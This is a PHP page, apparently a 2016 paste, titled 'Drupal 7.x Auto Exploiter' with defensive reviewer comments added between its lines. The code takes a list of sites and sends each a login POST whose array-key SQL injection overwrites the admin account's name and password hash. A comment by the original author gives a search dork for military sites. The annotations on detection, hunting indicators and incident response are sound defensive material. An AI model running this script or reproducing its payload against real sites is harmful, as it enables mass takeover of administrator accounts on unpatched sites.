Untitled

a guest
Jun 3rd, 2016
  <!--
    Reviewer context (defensive). This paste is a single PHP page: the form
    below collects a list of site URLs, and the PHP section sends each one a
    crafted login-form POST whose `name` field is an array with SQL text in
    the array key. The title labels it as targeting Drupal 7.x. It appears to
    correspond to the publicly documented Drupal 7 core SQL injection through
    array-valued form input; confirm the advisory id and the fixed release
    against Drupal's security advisories (TODO confirm).
    A site that was reachable while running an unpatched Drupal 7 core should
    be handled as potentially compromised, not merely as vulnerable.
    Finding this file on a web server is itself a sign that the host is being
    used to launch requests at other sites.
  -->
  1. <html><title>Drupal 7.x Auto Exploiter</title>
  2. <body bgcolor="#000000">
  3. <font color='red'><pre><p><center>
  4. _____ _ _ _ _ __
  5. | ___|_ _| | | | ___ | | __ _| |/ /___
  6. | |_ / _` | |_| |/ _ \| |/ _` | ' // _ \
  7. | _| (_| | _ | (_) | | (_| | . \ (_) |
  8. |_| \__,_|_| |_|\___/|_|\__,_|_|\_\___/
  9.  
  10. #Drupal Auto Exploiter
  11. #Coded by sofyan
  12. #Contact:v0v@outlook.com
  13. ______________________________________________________________
  14.  
  15. <pre>List Sites :</font><hre>
  <!-- The form posts back to this same page; the `sites` textarea is split on
       CRLF by the PHP below and each line is used as given, with no validation
       visible in this listing. -->
  16. <form method='POST'>
  17. <textarea name='sites' cols='45' rows='15'></textarea>
  18. <input type='submit' value='Exploit' /><br>
  19. </form>
  20. <?php
  21. /*
  22. Coded by sofyan
  23. inurl:sites/default/files/ site:mil.**
  24. */
  // The author note above is a search-engine query pattern for locating sites
  // through an indexed public files path. Keeping such paths out of search
  // indexes reduces discovery of this kind but is no substitute for patching.

  // Turns off all PHP error reporting for this script itself.
  25. error_reporting(0);
  // Assigned here but never read in the visible code.
  26. $log = "/user/login";
  // One entry per CRLF-separated line of the submitted textarea.
  27. $url=explode("\r\n", $_POST['sites']);
  // First pass: one POST per listed site, aimed at the login page form.
  28. foreach ($url as $site) {
  // Assigned here but never read in the visible code.
  29. $sofyan = "/?q=user";
  // Detection: the body carries a `name[...]` parameter whose array KEY holds
  // a complete SQL statement (semicolon, `update users set ...`, trailing `#`)
  // together with form_id=user_login. A normal login post sends `name` as a
  // plain string, so an array-valued `name` with SQL keywords or punctuation
  // in its key is a high-signal match for a WAF/IDS rule or a request-body log.
  // Hunting: the statement overwrites the name and pass columns of uid 1. The
  // account name and the `$S$...` hash literal on this line can be searched
  // for directly in the users table of a suspected site.
  30. $post_data = "name[0;update users set name %3D 'sofyan' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
  // Stream context describing a form-encoded POST with the body built above.
  31. $params = array(
  32. 'http' => array(
  33. 'method' => 'POST',
  34. 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
  35. 'content' => $post_data
  36. )
  37. );
  38. $ctx = stream_context_create($params);
  // Sends the POST to <site>/user/login/ and keeps only the response body.
  39. $data = file_get_contents($site . '/user/login/', null, $ctx);
  40. echo "<font color=blue>Testing user/login $site/user/login <br>";
  // The verdict rests on response text alone: a PHP warning string, or the
  // two marker values sent as `name` being echoed back. Nothing here checks
  // whether the statement actually ran, so a "Not Vulnerable" line from this
  // tool is not evidence that a site is patched or untouched. Verify the core
  // version and the uid 1 row instead.
  41. if((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data)|| (stristr($data, 'FcUk Crap') && $data)) {
  // The password shown is a fixed string printed by the tool; nothing in this
  // listing verifies it against the hash sent above.
  42. echo "<font color=green>User :sofyan <br>Password :admin<br>";
  43. } else {
  44. echo "<font color=red>Not Vulnerable. <br>";
  45. }
  46. }
  // Second pass over the same list. Same injected array key, but posted with
  // form_id=user_login_block to <site>?q=node&destination=node (presumably the
  // login block shown on content pages; confirm). Detection rules written
  // for the first request should cover this form_id and path as well.
  47. $url=explode("\r\n", $_POST['sites']);
  48. foreach ($url as $site) {
  49. $post_data = "name[0;update users set name %3D 'sofyan' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
  50. $params = array(
  51. 'http' => array(
  52. 'method' => 'POST',
  53. 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
  54. 'content' => $post_data
  55. )
  56. );
  57. $ctx = stream_context_create($params);
  58. $data = file_get_contents($site . '?q=node&destination=node', null, $ctx);
  // The progress line still prints /user/login although the request above went
  // to the ?q=node URL.
  59. echo "<font color=blue>Testing at Index $site/user/login <br>";
  // Only the PHP warning string is checked on this pass.
  60. if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
  61. echo "<font color=green>User :sofyan <br> Password :admin <br>";
  62.  
  63. } else {
  64. echo "<font color=red>Not Vulnerable. \n ";
  65. }
  66. }
  // Response guidance if the indicators above turn up on a site: upgrade
  // Drupal core to a fixed release, reset the uid 1 credentials, audit the
  // users table for unexpected accounts and role grants, invalidate active
  // sessions, and review the site for further changes made after the first
  // matching request.
  67. ?>
  68. </pre></p></center>